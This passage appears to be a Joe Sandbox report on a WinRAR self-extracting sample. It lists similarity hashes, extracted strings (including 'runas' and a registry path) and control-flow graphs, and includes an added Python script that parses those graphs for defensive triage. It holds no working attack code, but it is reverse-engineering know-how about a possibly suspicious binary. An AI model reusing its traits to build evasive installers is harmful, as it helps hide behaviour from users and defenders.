                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                                        • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 255727823-2702805183
                                                                                        • Opcode ID: 83516b496832df66609d2f7752fbed995108ff099c8edb5f76a574fc7c44a595
                                                                                        • Instruction ID: 8fe1ba6ee1c6381269f7452a02f1b7093a378df598881c83728ee629883a5ffe
                                                                                        • Opcode Fuzzy Hash: 83516b496832df66609d2f7752fbed995108ff099c8edb5f76a574fc7c44a595
                                                                                        • Instruction Fuzzy Hash: 9FD29462E49A8241FB21DB26E8546FA6B51FFE5B80F404135F96D87AE5FE3CE548C300
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                                        • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                        • API String ID: 3007431893-3916287355
                                                                                        • Opcode ID: 465fa9c0b495f8b61847ecd005979357875d1cda7aa02ff290f8600b24eee8b0
                                                                                        • Instruction ID: ec42bbd84eefdcb69cb4ce8222cb508591ec99f10cddcc8accd173fd144e11e4
                                                                                        • Opcode Fuzzy Hash: 465fa9c0b495f8b61847ecd005979357875d1cda7aa02ff290f8600b24eee8b0
                                                                                        • Instruction Fuzzy Hash: 02139462F04B4285FB10DF66D8402FD2BA1FBA4798F500536EA6D97AD9EF38D589C340

                                                                                        Similarity
                                                                                        • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 1048086575-3710569615
                                                                                        • Opcode ID: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
                                                                                        • Instruction ID: 790860f302ce53ab02e9c9bee46b50e15b71ba03b0bc6372a9971c38413533b2
                                                                                        • Opcode Fuzzy Hash: cf857dfdb846402a04b639880a0f56ecddc48e970ed32f05d0be7d60c6edf358
                                                                                        • Instruction Fuzzy Hash: B8124161E19B8685EB10DB26E8452B96B62FFE4794F404235FA6D86BE5FF3CE144C300


                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                        • String ID: $%s:$CAPTION
                                                                                        • API String ID: 2100155373-404845831
                                                                                        • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                        • Instruction ID: 68cc76716d87b0572f3b3c7c1c7027f2d5f91ff5fe6773d4c7a6c7cbb95f6615
                                                                                        • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                        • Instruction Fuzzy Hash: 8E91B672F1864286E714DF2AA80066EBBA1FBD4784F445535FE5D97B98EE3CE805CB00

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                        • String ID: PNG
                                                                                        • API String ID: 211097158-364855578
                                                                                        • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                        • Instruction ID: dc6e0d4a43d924d1f842795150475b6da666e3faf18668a6b37d8cb23a15e456
                                                                                        • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                        • Instruction Fuzzy Hash: 33410925F19A0281EB05DB979848379ABA0AFE8F94F044435EA2DC77E4FE7CE449C700
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: __tmp_reference_source_
                                                                                        • API String ID: 3668304517-685763994
                                                                                        • Opcode ID: d0e6c7c07de011f9d1d4fd04177219c70b4fe0a47e1a326b15a4d61e2b0fa1d9
                                                                                        • Instruction ID: e8a9b6851ef125d4d252e07a5119b3822a39255ca6bd9ff45a11dbe7ab2c636a
                                                                                        • Opcode Fuzzy Hash: d0e6c7c07de011f9d1d4fd04177219c70b4fe0a47e1a326b15a4d61e2b0fa1d9
                                                                                        • Instruction Fuzzy Hash: DBE27562E0C6C192EB64CB26E1403AE6B61FBE5750F444132EBAD936E9EF3CE555C700
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: CMT
                                                                                        • API String ID: 3668304517-2756464174
                                                                                        • Opcode ID: 3621ef844e84e6c8b5ed89fe876b50e8c17ab69de9b061cb775712f64666389b
                                                                                        • Instruction ID: 23fdf40e2ebab8debc3d1e3bff14b8d910fda463783ecec617927178775378c6
                                                                                        • Opcode Fuzzy Hash: 3621ef844e84e6c8b5ed89fe876b50e8c17ab69de9b061cb775712f64666389b
                                                                                        • Instruction Fuzzy Hash: 35E2DF22F0C68286EB18DB66D4502FD6BA1FBA5784F440135EA6E877D6EF3CE655C300

                                                                                        Control-flow Graph (one basic block per line: id, address range, calls made in the block; edges as src->dst)
                                                                                        3856 7ff6fe1940bc-7ff6fe1940f3
                                                                                        3857 7ff6fe1941d2-7ff6fe1941df FindNextFileW 3856->3857
                                                                                        3858 7ff6fe1940f9-7ff6fe194101 3856->3858
                                                                                        3861 7ff6fe1941e1-7ff6fe1941f1 GetLastError 3857->3861
                                                                                        3862 7ff6fe1941f3-7ff6fe1941f6 3857->3862
                                                                                        3859 7ff6fe194103 3858->3859
                                                                                        3860 7ff6fe194106-7ff6fe194118 FindFirstFileW 3858->3860 3859->3860 3860->3862
                                                                                        3863 7ff6fe19411e-7ff6fe194146 call 7ff6fe196a0c 3860->3863
                                                                                        3864 7ff6fe1941ca-7ff6fe1941cd 3861->3864
                                                                                        3865 7ff6fe194211-7ff6fe194253 call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 3862->3865
                                                                                        3866 7ff6fe1941f8-7ff6fe194200 3862->3866
                                                                                        3878 7ff6fe194167-7ff6fe194170 3863->3878
                                                                                        3879 7ff6fe194148-7ff6fe194164 FindFirstFileW 3863->3879
                                                                                        3868 7ff6fe1942eb-7ff6fe19430e call 7ff6fe1b2320 3864->3868
                                                                                        3892 7ff6fe194255-7ff6fe19426c 3865->3892
                                                                                        3893 7ff6fe19428c-7ff6fe1942e6 call 7ff6fe19f168 * 3 3865->3893
                                                                                        3870 7ff6fe194202 3866->3870
                                                                                        3871 7ff6fe194205-7ff6fe19420c call 7ff6fe1820b0 3866->3871 3870->3871 3871->3865
                                                                                        3880 7ff6fe194172-7ff6fe194189 3878->3880
                                                                                        3881 7ff6fe1941a9-7ff6fe1941ad 3878->3881 3879->3878
                                                                                        3883 7ff6fe1941a4 call 7ff6fe1b220c 3880->3883
                                                                                        3884 7ff6fe19418b-7ff6fe19419e 3880->3884 3881->3862
                                                                                        3885 7ff6fe1941af-7ff6fe1941be GetLastError 3881->3885 3883->3881 3884->3883
                                                                                        3887 7ff6fe194315-7ff6fe19431b call 7ff6fe1b7904 3884->3887
                                                                                        3889 7ff6fe1941c0-7ff6fe1941c6 3885->3889
                                                                                        3890 7ff6fe1941c8 3885->3890 3889->3864 3889->3890 3890->3864
                                                                                        3895 7ff6fe19426e-7ff6fe194281 3892->3895
                                                                                        3896 7ff6fe194287 call 7ff6fe1b220c 3892->3896 3893->3868 3895->3896
                                                                                        3899 7ff6fe19430f-7ff6fe194314 call 7ff6fe1b7904 3895->3899 3896->3893 3899->3887
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                        • String ID:
                                                                                        • API String ID: 474548282-0
                                                                                        • Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                                                                        • Instruction ID: b03f5d262f62fcb6ef0d914dcd4243f20c7f64da041266a7e5f70a36a165aeac
                                                                                        • Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                                                                        • Instruction Fuzzy Hash: CA617162E0864681EB10DB2AE88026D6761FBE97A4F505331FABD877D9EF3CE554C700
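The control-flow graphs in this report are exported as a flat token stream, which is hard to query by hand once a function has more than a handful of blocks. The script below is an added example, not code from Joe Sandbox or from the analysed sample: it parses that stream into basic blocks and edges and answers the questions a triager asks of it (which blocks invoke which Win32 API, where the function enters and returns, and the shortest block path from the entry to a given API call). The token grammar is inferred from the dumps on this page and is an assumption, as are the names FILE_ENUM_CFG, parse_cfg, api_blocks, entry_and_exit_blocks and api_path; the embedded input is the dump for the file-enumeration function at 7ff6fe1940bc, copied from this report.

```python
"""Parse a Joe Sandbox control-flow-graph dump and query it.

Added example, not code from Joe Sandbox or from the analysed sample.
The grammar is inferred from the dumps on this page (an assumption):
a basic block is "<id> <start>[-<end>]", followed by "call <addr>" entries
(optionally "* N" for repeats) or bare Win32 API names; an edge is
"<src>-><dst>".
"""
import re
from collections import defaultdict, deque

# Dump for the file-enumeration function at 7ff6fe1940bc, copied from this
# report; the line breaks are only for readability (the parser splits on whitespace).
FILE_ENUM_CFG = """
control_flow_graph 3856 7ff6fe1940bc-7ff6fe1940f3 3857 7ff6fe1941d2-7ff6fe1941df FindNextFileW
3856->3857 3858 7ff6fe1940f9-7ff6fe194101 3856->3858 3861 7ff6fe1941e1-7ff6fe1941f1 GetLastError
3857->3861 3862 7ff6fe1941f3-7ff6fe1941f6 3857->3862 3859 7ff6fe194103 3858->3859
3860 7ff6fe194106-7ff6fe194118 FindFirstFileW 3858->3860 3859->3860 3860->3862
3863 7ff6fe19411e-7ff6fe194146 call 7ff6fe196a0c 3860->3863 3864 7ff6fe1941ca-7ff6fe1941cd 3861->3864
3865 7ff6fe194211-7ff6fe194253 call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 3862->3865
3866 7ff6fe1941f8-7ff6fe194200 3862->3866 3878 7ff6fe194167-7ff6fe194170 3863->3878
3879 7ff6fe194148-7ff6fe194164 FindFirstFileW 3863->3879 3868 7ff6fe1942eb-7ff6fe19430e call 7ff6fe1b2320
3864->3868 3892 7ff6fe194255-7ff6fe19426c 3865->3892 3893 7ff6fe19428c-7ff6fe1942e6 call 7ff6fe19f168 * 3
3865->3893 3870 7ff6fe194202 3866->3870 3871 7ff6fe194205-7ff6fe19420c call 7ff6fe1820b0 3866->3871
3870->3871 3871->3865 3880 7ff6fe194172-7ff6fe194189 3878->3880 3881 7ff6fe1941a9-7ff6fe1941ad 3878->3881
3879->3878 3883 7ff6fe1941a4 call 7ff6fe1b220c 3880->3883 3884 7ff6fe19418b-7ff6fe19419e 3880->3884
3881->3862 3885 7ff6fe1941af-7ff6fe1941be GetLastError 3881->3885 3883->3881 3884->3883
3887 7ff6fe194315-7ff6fe19431b call 7ff6fe1b7904 3884->3887 3889 7ff6fe1941c0-7ff6fe1941c6 3885->3889
3890 7ff6fe1941c8 3885->3890 3889->3864 3889->3890 3890->3864 3895 7ff6fe19426e-7ff6fe194281 3892->3895
3896 7ff6fe194287 call 7ff6fe1b220c 3892->3896 3893->3868 3895->3896
3899 7ff6fe19430f-7ff6fe194314 call 7ff6fe1b7904 3895->3899 3896->3893 3899->3887
"""

ADDR = re.compile(r"^[0-9a-f]{8,16}(-[0-9a-f]{8,16})?$")   # "start" or "start-end"
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(dump):
    """Return ({block_id: {"range": str, "calls": [str, ...]}}, [(src, dst), ...])."""
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = int(tok)                           # start of a new basic block
            blocks[current] = {"range": tokens[i + 1], "calls": []}
            i += 2
        else:
            if current is None:
                raise ValueError(f"call token {tok!r} before any block")
            if tok == "call":                            # internal call to a sub_xxx
                name, i = "call " + tokens[i + 1], i + 2
            else:                                        # resolved import, e.g. FindNextFileW
                name, i = tok, i + 1
            if i + 1 < len(tokens) and tokens[i] == "*" and tokens[i + 1].isdigit():
                name, i = f"{name} * {tokens[i + 1]}", i + 2   # "call X * N": repeated N times
            blocks[current]["calls"].append(name)
    return blocks, edges


def api_blocks(blocks):
    """Map each resolved Win32 API name to the ids of the blocks that invoke it."""
    out = defaultdict(list)
    for bid, blk in blocks.items():
        for name in blk["calls"]:
            if not name.startswith("call "):
                out[name.split(" * ")[0]].append(bid)
    return dict(out)


def entry_and_exit_blocks(blocks, edges):
    """Blocks with no predecessor (function entry) and with no successor (returns)."""
    has_pred = {dst for _, dst in edges}
    has_succ = {src for src, _ in edges}
    return (sorted(b for b in blocks if b not in has_pred),
            sorted(b for b in blocks if b not in has_succ))


def api_path(blocks, edges, start, api):
    """Shortest block path (BFS) from `start` to a block calling `api`, or None."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    hits = set(api_blocks(blocks).get(api, []))
    queue, prev = deque([start]), {start: None}
    while queue:
        node = queue.popleft()
        if node in hits:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in succ[node]:
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


if __name__ == "__main__":
    blocks, edges = parse_cfg(FILE_ENUM_CFG)
    print(f"{len(blocks)} blocks, {len(edges)} edges; entry/exit: {entry_and_exit_blocks(blocks, edges)}")
    for api, ids in sorted(api_blocks(blocks).items()):
        print(f"{api:16} called in blocks {ids}")
    print("entry -> GetLastError:", api_path(blocks, edges, 3856, "GetLastError"))
```

Because the parser splits on whitespace, the longer dump further down this page (the function at 7ff6fe19dfd0, whose export wrapped across two lines) can be pasted in unchanged; edges that appear before their source block is defined are simply collected as they come.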
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CMT
                                                                                        • API String ID: 0-2756464174
                                                                                        • Opcode ID: 92e72442b0651b6fe78cc2a3e1d7e8b257f9506ac908177fd119fb022d21258c
                                                                                        • Instruction ID: 26ddd335371aae9232a6afbe46dbba2b75ec333509daafc5b254e180404d735f
                                                                                        • Opcode Fuzzy Hash: 92e72442b0651b6fe78cc2a3e1d7e8b257f9506ac908177fd119fb022d21258c
                                                                                        • Instruction Fuzzy Hash: 3842A362F0C68196EB18DB76D1512FD7BA1EBA1744F400136EB6E936D6EF38E658C300
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                                                                                        • Instruction ID: 5fbe3f283542cb50294a156bccd4216b51280bb8c71c8c5e529d6c0f9b2ff6b2
                                                                                        • Opcode Fuzzy Hash: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                                                                                        • Instruction Fuzzy Hash: 5DE1C762E4828246EB74CF2AA04427D7B91FBA4B48F054135EB6EC77C5EE3CE559C704
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                                                        • Instruction ID: 5e4258a9ce81ef1b048c98820c4eb5252ea7f564bd65706c64b5bc9281db599e
                                                                                        • Opcode Fuzzy Hash: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                                                        • Instruction Fuzzy Hash: 9EB1BFA2B04B8952DF58DA6695087FDA791BB95FC4F488036EE2D87781EF3CE159C300
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID:
                                                                                        • API String ID: 3340455307-0
                                                                                        • Opcode ID: b898a5790bc13ce9467efc73a41fb0efef5aff7df3bcc575331cae3ab7ee1eec
                                                                                        • Instruction ID: 4999e7b9d743b2c2a3c4cb620f20def4a12992c89a3a5940bc413689d39459e4
                                                                                        • Opcode Fuzzy Hash: b898a5790bc13ce9467efc73a41fb0efef5aff7df3bcc575331cae3ab7ee1eec
                                                                                        • Instruction Fuzzy Hash: 9741E522F1566686FB64DE23E99076E2A52BBD4788F044030EE5E877D8EE3CE456C704

                                                                                        Control-flow Graph (one basic block per line: id, address range, calls made in the block; edges as src->dst)
                                                                                        0 7ff6fe19dfd0-7ff6fe19e024 call 7ff6fe1b2450 GetModuleHandleW
                                                                                        3 7ff6fe19e026-7ff6fe19e039 GetProcAddress 0->3
                                                                                        4 7ff6fe19e07b-7ff6fe19e3a5 0->4
                                                                                        7 7ff6fe19e053-7ff6fe19e066 GetProcAddress 3->7
                                                                                        8 7ff6fe19e03b-7ff6fe19e04a 3->8
                                                                                        5 7ff6fe19e503-7ff6fe19e521 call 7ff6fe196454 call 7ff6fe197df4 4->5
                                                                                        6 7ff6fe19e3ab-7ff6fe19e3b4 call 7ff6fe1bb788 4->6
                                                                                        20 7ff6fe19e525-7ff6fe19e52f call 7ff6fe1951a4 5->20 6->5
                                                                                        14 7ff6fe19e3ba-7ff6fe19e3fd call 7ff6fe196454 CreateFileW 6->14 7->4
                                                                                        11 7ff6fe19e068-7ff6fe19e078 7->11 8->7 11->4
                                                                                        22 7ff6fe19e4f0-7ff6fe19e4fe CloseHandle call 7ff6fe181fa0 14->22
                                                                                        23 7ff6fe19e403-7ff6fe19e416 SetFilePointer 14->23
                                                                                        27 7ff6fe19e531-7ff6fe19e53c call 7ff6fe19dd88 20->27
                                                                                        28 7ff6fe19e564-7ff6fe19e5ac call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 call 7ff6fe181fa0 call 7ff6fe1932bc 20->28 22->5 23->22
                                                                                        25 7ff6fe19e41c-7ff6fe19e43e ReadFile 23->25 25->22
                                                                                        29 7ff6fe19e444-7ff6fe19e452 25->29 27->28
                                                                                        39 7ff6fe19e53e-7ff6fe19e562 CompareStringW 27->39
                                                                                        67 7ff6fe19e5b1-7ff6fe19e5b4 28->67
                                                                                        32 7ff6fe19e800-7ff6fe19e807 call 7ff6fe1b2624 29->32
                                                                                        33 7ff6fe19e458-7ff6fe19e4ac call 7ff6fe1b797c call 7ff6fe18129c 29->33
                                                                                        50 7ff6fe19e4c3-7ff6fe19e4d9 call 7ff6fe19d0a0 33->50 39->28
                                                                                        42 7ff6fe19e5bd-7ff6fe19e5c6 39->42 42->20
                                                                                        45 7ff6fe19e5cc 42->45
                                                                                        48 7ff6fe19e5d1-7ff6fe19e5d4 45->48
                                                                                        52 7ff6fe19e63f-7ff6fe19e642 48->52
                                                                                        53 7ff6fe19e5d6-7ff6fe19e5d9 48->53
                                                                                        60 7ff6fe19e4ae-7ff6fe19e4be call 7ff6fe19dd88 50->60
                                                                                        61 7ff6fe19e4db-7ff6fe19e4eb call 7ff6fe181fa0 * 2 50->61
                                                                                        56 7ff6fe19e7c2-7ff6fe19e7ff call 7ff6fe181fa0 * 2 call 7ff6fe1b2320 52->56
                                                                                        57 7ff6fe19e648-7ff6fe19e65b call 7ff6fe197eb0 call 7ff6fe1951a4 52->57
                                                                                        58 7ff6fe19e5dd-7ff6fe19e62d call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 call 7ff6fe181fa0 call 7ff6fe1932bc 53->58
                                                                                        82 7ff6fe19e661-7ff6fe19e701 call 7ff6fe19dd88 * 2 call 7ff6fe19aae0 call 7ff6fe19da98 call 7ff6fe19aae0 call 7ff6fe19dc2c call 7ff6fe1a87ac call 7ff6fe1819e0 57->82
                                                                                        83 7ff6fe19e706-7ff6fe19e753 call 7ff6fe19da98 AllocConsole 57->83
                                                                                        107 7ff6fe19e62f-7ff6fe19e638 58->107
                                                                                        108 7ff6fe19e63c 58->108 60->50 61->22
                                                                                        72 7ff6fe19e5ce 67->72
                                                                                        73 7ff6fe19e5b6 67->73 72->48 73->42
                                                                                        99 7ff6fe19e7b4-7ff6fe19e7bb call 7ff6fe1819e0 ExitProcess 82->99
                                                                                        94 7ff6fe19e7b0 83->94
                                                                                        95 7ff6fe19e755-7ff6fe19e7aa GetCurrentProcessId AttachConsole call 7ff6fe19e868 call 7ff6fe19e858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->99 95->94 107->58
                                                                                        112 7ff6fe19e63a 107->112 108->52 112->52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
